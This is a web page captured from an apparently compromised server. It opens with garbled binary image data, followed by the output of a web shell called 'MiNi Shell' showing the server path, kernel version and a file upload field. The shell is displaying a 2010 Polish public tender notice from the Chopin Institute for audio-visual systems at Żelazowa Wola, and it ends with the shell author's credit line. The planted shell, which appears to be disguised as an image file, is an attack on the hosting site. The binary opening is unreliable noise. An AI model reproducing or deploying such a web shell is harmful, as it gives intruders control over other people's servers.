JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100312/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100312/68984-N-2010.html

<p class="kh_header"><b>Warszawa: Dostawa i montaż systemu audio-wizualnego do sali wielofunkcyjnej w budynku CD oraz do sali multimedialnej w budynku A na terenie Zabytkowego Parku w Żelazowej Woli</b><br>
<b>Numer ogłoszenia: 68984 - 2010; data zamieszczenia: 12.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Narodowy Instytut Fryderyka Chopina , ul. Tamka 43, 00-355 Warszawa, woj. mazowieckie, tel. 22 44 16 100, faks 22 44 16 112.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chopin.nifc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż systemu audio-wizualnego do sali wielofunkcyjnej w budynku CD oraz do sali multimedialnej w budynku A na terenie Zabytkowego Parku w Żelazowej Woli.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:

1. Przygotowanie rozwiązań projektowych (szczegółowa koncepcja) spełniających wymagania i założenia Zamawiającego.
W szczególności należy:
-przedstawić elementy składowe systemu (dobór urządzeń), z wyczerpującym i jednoznacznym opisem funkcjonowania całego systemu oraz jego poszczególnych elementów;
-uzasadnić wybór elementów składowych systemu z podaniem ich parametrów i ceny;
-przedstawić konfigurację i rozmieszczenie poszczególnych elementów systemu.

2. Zainstalowanie systemu audio-wizualnego w Sali Wielofunkcyjnej w nowym budynku CD na terenie Zabytkowego Parku w Żelazowej Woli, zapewniającego projekcję kinową i reprodukcję dźwięku w wysokim standardzie oraz funkcje multimedialne. Przy czym zaproponowane rozwiązania powinny mieć uzasadnienie ekonomiczne z punktu widzenia wyważonych proporcji kosztu poszczególnych elementów systemu.
W Sali Wielofunkcyjnej aktualnie prowadzone są prace wykończeniowe architektury wnętrz.
Wykorzystanie Sali Wielofunkcyjnej oraz rozwiązanie systemu audio-wizualnego ma zapewniać uniwersalność wykorzystania pomieszczenia, z pierwszoplanowym uwzględnieniem wysokiej jakości projekcji filmowych (z uwzględnieniem również wysokiej jakości audio z możliwością samodzielnego funkcjonowania - niezależnie od projekcji filmowych), a w następnej kolejności potrzeb konferencji i prezentacji multimedialnych.

3. Zainstalowanie systemu audio-wizualnego w Sali Multimedialnej w nowym budynku A na terenie Zabytkowego Parku w Żelazowej Woli, spełniającego niżej określone założenia.

Zaproponowane rozwiązania powinny zapewniać otwartą strukturę systemu z możliwością uzupełnień i dalszej jego rozbudowy wynikającej z nowych potrzeb Zamawiającego, w taki sposób, by dalsza rozbudowa systemu nie wpłynęła na obniżenie jakości oraz funkcjonalności zaproponowanej struktury systemu spełniającej poniżej przedstawione wymagania..

Dodatkowo, po wyborze rozwiązania korzystnego dla Zamawiającego, ma on prawo zażądać przedstawienia dokładnego projektu końcowego, a po zakończeniu prac instalacyjnych - dokumentacji powykonawczej. 

Przy przygotowywaniu rozwiązań projektowych wymaganym minimum jest stosowanie się przez Wykonawcę do wymogów i zaleceń normowych standardu THX oraz uwzględnienie najnowszych formatów dźwiękowych.

W załączeniu do oferty, Wykonawca zobowiązany jest przedstawić przykłady wykonanych przez siebie instalacji (w szczególności zdjęcia). Zamawiający zakłada możliwość zwrócenia się do wykonawcy o przedłożenie wyjaśnień treści złożonych ofert zgodnie z art. 87 ust. 1 ustawy Pzp.

Do przygotowania niniejszej oferty Zamawiający udostępnia w załączeniu do SIWZ ogólny rysunek rzutu Sali CD z rozplanowaniem widowni oraz przekrój podłużny i poprzeczny.

Na życzenie, po telefonicznym uzgodnieniu terminu, Zamawiający udostępnia Sale dla Wykonawcy do wizji lokalnej. Wizja lokalna po uzgodnieniu telefonicznym z Panem Michałem Kamińskim - tel. 502 739 322 lub z Panem Tomaszem Leszkowiczem - tel. 022 44 16 201 od poniedziałku do piątku w godzinach 8.30-15.00.


Instalacja dla Sali Wielofunkcyjnej w budynku CD:

Wymagania dotyczące prezentacji obrazu w Sali Wielofunkcyjnej budynku CD:

Ekran:
Wariant A 
Ekran o proporcjach 16:9;
Rozmiar minimum 500x281 cm (podano wymiary przybliżone, rozmiar może wahać się w niewielkich odchyleniach);
Konstrukcja ramowa wykończona na czarno.

Wariant B
Ekran o proporcjach 21:9;
Rozmiar ok. 656 x 281 cm (wysokość ma być dostosowana odpowiednio do wysokości z propozycji ekranu w wariancie A, podano wymiary przybliżone, rozmiar może wahać się w niewielkich odchyleniach);
Konstrukcja ramowa wykończona na czarno.

Projektor:
Technologia DLP;
Minimalna rozdzielczość matrycy FullHD (1920x1080);
Jasność minimalna 6000 ANSI Lumen(ów);
Odległość projektora do ekranu ok. 16 m;
Wyposażony we wszystkie niezbędne typy wejść cyfrowych i analogowych dla potrzeb projekcji kinowej i prezentacji komputerowych;
Zapewniona funkcja zoom dla możliwości dopasowania obrazu do odpowiedniej zmiany dla dwóch wyżej wymienionych rozmiarów ekranu.

Wymagania dotyczące nagłośnienia w Sali Wielofunkcyjnej budynku CD:

System nagłośnienia:
Wszystkie głośniki przystosowane dla w pełni aktywnej konfiguracji (Full Active Ready).

Nagłośnienie przednie:
Jednakowe nagłośnienie przednie L+C+P (Lewy+Centralny+Prawy);
Układ nagłośnienia przedniego w postaci głośników wyrównanych liniowo (Line Array set-up). W szczególności głośniki wysokotonowe w układzie Cylinder wave HF + minimum podwójne głośniki niskośredniotonowe 6cali Lo-Mid Frequency w poziomej konfiguracji d-Appolito.

Wymagania dotyczące instalacji głośników przednich: (ze względu na wymagania aranżacji wnętrz i przestrzeni montażowej):
Głębokość maksymalna 20 cm;
Szerokość maksymalna 60 cm;
Odległość do pierwszego rzędu siedzeń 6 m (w rzucie);
Ilość miejsc na widowni ok. 75 (układ jak na załączonym rzucie pomieszczenia).

Nagłosnienie sub-niskotonowe (Subwoofery):
W oparciu o przetworniki w rozmiarze minimum 12cali;
Ilość minimalna 4 szt.;
Głębokość maksymalna 60 cm.

Nagłośnienie dookólne (surround):
Przygotowane dla dwudrożnej konfiguracji aktywnej (2 Way Active Ready);
W oparciu o głośniki 5cali lub 6cali Lo-MID w pionowym układzie d-Appolito;
Głębokość maksymalna 17 cm (głębokość montażowa).

Stosowna elektronika dla powyższego systemu nagłośnienia.

Wymagania pozostałe dotyczące systemu w Sali Wielofunkcyjnej budynku CD:

Przedwzmacniacz wielokanałowy:
Minimum (7.1), wyposażony w minimum 3 wejścia HDMI oraz komplet wejść analogowych w układzie minimum 7.1 (7.1 external analog multichannel input).

Mikser audio:
Minimum 8 kanałowy z minimum 2 wejściami mikrofonowymi.

Źródła A-V:
Dwa odtwarzacze blu-ray;

Odtwarzacz CD z możliwością odtwarzania plików MP3.

System sterowania bezprzewodowego:
Wyposażony minimalnie w sterowanie na podczerwień, wyposażony w panel dotykowy programowalny dla sterowania podstawowych funkcji audio-wizualnych oraz oświetlenia.

Mikrofony:
Minimum dwa mikrofony bezprzewodowe (1 handheld, 1 microport).

Okablowanie:
Kompletne niezbędne okablowanie dla połączeń wszystkich elementów systemu.
Wariantowo przewidzieć okablowanie i przyłącza dla prezentacji multimedialnych przy ścianie przedniej Sali (wymagania minimalne to wysyłka sygnału audio-wizualnego z przedniej części Sali do pomieszczenia operatora na końcu Sali).

Należy uwzględnić wymagane niezbędne materiały instalacyjne.

Urządzenia elektroniczne powinny być umieszczone w pomieszczeniu operatora w tylnej części Sali.

Instalacja dla Sali Multimedialnej w budynku A:

Wysokiej jakości prezentacja obrazu:
Minimum 4 monitory prezentacyjne o rozdzielczości FullHD (1920x1080) i minimalnej przekątnej obrazu 50cali;
Montaż w układzie podwieszonym pod sufitem w klastrze obwodowo-centralnym.

Nagłośnienie dźwięku towarzyszącego prezentacji obrazu (muzyka w tle wysokiej jakości):
System w oparciu o minimum 4 głośniki:
W wariancie A - przeznaczone do montażu sufitowego;
W wariancie B - przeznaczone do montażu ściennego;
Zintegrowany wzmacniacz stereofoniczny.

Źródła A-V:
Dwa odtwarzacze blu-ray.

Okablowanie i materiały instalacyjne:
Należy uwzględnić wymagane niezbędne materiały instalacyjne z kompletnym okablowaniem dla połączeń wszystkich elementów systemu (w szczególności 4 kable HDMI, wariantowo 4 kable VGA, okablowanie głośnikowe, dla powyższego okablowania należy przyjąć długość 20 m).


Gwarancja dla głośników minimum 10 lat.
Gwarancja dla urządzeń elektronicznych, osprzętu i przyłączy minimum 2 lata.
Serwis pogwarancyjny minimum 3 lata.

Uzupełnienie szczegółowego opisu przedmiotu zamówienia stanowią rysunki techniczne wg załącznika nr 5 a-d do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Maksymalnie do 20% wrtości zamówienia podstawowego - możliwość rozbudowania o nowe technlogie umożliwiające rozbudowę i zwiększenie funkcjonalności systemu.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 32.32.12.00-1, 32.33.16.00-8, 32.33.34.00-0, 32.34.24.00-6, 32.34.24.12-3, 32.35.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> tak.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy - Zamawiający nie żąda składania wadium w przedmiotowym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a. Jeżeli przepisy prawa nakładają obowiązek posiadania uprawnień do wykonywania działalności lub czynności odpowiadającej przedmiotowi zamówienia, Wykonawcy zobowiązani są do przedłożenia wraz z ofertą odpowiednich dokumentów, np. koncesji, zezwolenia lub licencji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a. Odpowiednie doświadczenie i wiedzę niezbędne do realizacji przedmiotowego zamówienia posiadają Wykonawcy, którzy w okresie ostatnich trzech lat przed upływem terminu składnia ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali minimum jedno zamówienie (w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia) polegające na realizacji dostawy i montażu odpowiadającego przedmiotowi zamówienia, tj. przygotowali koncepcję oraz na jej podstawie dostarczyli, zamontowali oraz uruchomili -  wdrożyli do użytkowania system audio-wizualny o wartości nie mniejszej niż 60.000 zł brutto. Ocena spełniania tego warunku zostanie dokonana na podstawie przedłożonego przez Wykonawcę wraz z ofertą wykazu dostaw (zgodnie ze wzorem określonym w załączniku nr 3 do SIWZ) zawierającego: wskazanie podmiotu realizującego zamówienie - pełne dane - nazwa, dane teleadresowe, jeżeli jest to podmiot, inny niż Wykonawca przedkładający ofertę w związku z art. 26 ust. 2 b ustawy Prawo zamówień publicznych, przedmiot zamówienia wraz z ogólnym opisem funkcjonalnym, dat wykonania- od-do w systemie dd/mm/rrrr-dd/mm/rrrr i odbiorców - Zamawiających wraz ze wskazaniem ich pełnych danych teleadresowych umożliwiających ich bezsporną identyfikację i potwierdzenie składanych informacji, wskazanie wartości przedmiotu zamówienia (zł brutto), wraz z załączeniem dokumentów potwierdzających, że dostawa ta została wykonana należycie (np. referencje).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a. Oferta wg formularza stanowiącego załącznik nr 1 do SWIZ;
b. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku podmioty występujące wspólnie o dopuszczenie do udziału w postępowaniu ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i/lub do zawarcia umowy w sprawie zamówienia publicznego, a pełnomocnictwo przedstawiają zamawiającemu wraz z ofertą. Pełnomocnictwo musi być złożone w formie oryginału bądź kopii poświadczonej przez notariusza. Wykonawcy ci, występujący wspólnie, będą musieli przed zawarciem umowy na realizację przedmiotu zamówienia mieć uregulowany stan prawny w postaci umowy zawartej pomiędzy nimi, ustalającej zasady ich współpracy, przewidującej ich współdziałanie, sposób odpowiedzialności wraz z jej zakresem, pełnomocnictwa. Umowa taka może być zawarta już na etapie składania ofert i przedłożona zamawiającemu wraz z ofertą. 
W przypadku oferty składanej wspólnie przez kilka podmiotów (dwa lub więcej) konieczne jest przedłożenie przez każdy z tych podmiotów oddzielnie dokumentów, o których mowa w pkt. 9.2 SIWZ, aby potwierdzić, iż niepodlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1. Pozostałe dokumenty składają podmioty ubiegające się o udzielenie zamówienia publicznego w taki sposób, aby potwierdzić, iż wspólnie spełniają warunki udziału w postępowaniu zgodnie z opisem sposobu dokonywania oceny spełniania tych warunków.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - przedstawienie elementów składowych systemu (dobór urządzeń), z wyczerpującym i jednoznacznym opisem funkc. całego sys. oraz jego poszcz. element - 10</li>
<li>3 - uzasadnienie wyboru elementów składowych systemu z podaniem ich parametrów i ceny - 25</li>
<li>4 - przedstawienie konfiguracji i rozmieszczenia poszczególnych elementów systemu - 15</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonywania zmian postanowień zawartej umowy w ramach niniejszego postępowania o udzielenie zamówienia publicznego, jeżeli konieczność takich zmian będzie wynikać z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, lub zmiany te będą korzystne dla Zamawiającego i interesu publicznego. Możliwość zmian związana jest między innymi z możliwością dokonania ewentualnej korekty w zakresie przedstawionych przez Wykonawców rozwiązań wariantowych w celu osiągnięcia maksymalnie najkorzystniejszych i najbardziej optymalnych rozwiązań związanych z jakością i parametrami sprzętu jeżeli nie wpłynie to na cenę oraz w żadnym razie nie spowoduje przedłużenia terminu realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> wwwchopin.nifc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Narodowy Instytut Fryderyka Chopina w Warszawie, ul. Tamka 43 - piętro 5, pok. nr 1 - Zespół Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2010 godzina 11:00, miejsce: Narodowy Instytut Fryderyka Chopina w Warszawie, ul. Tamka 43 - piętro 5, pok. nr 1 - Zespół Zamówień Publicznych.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com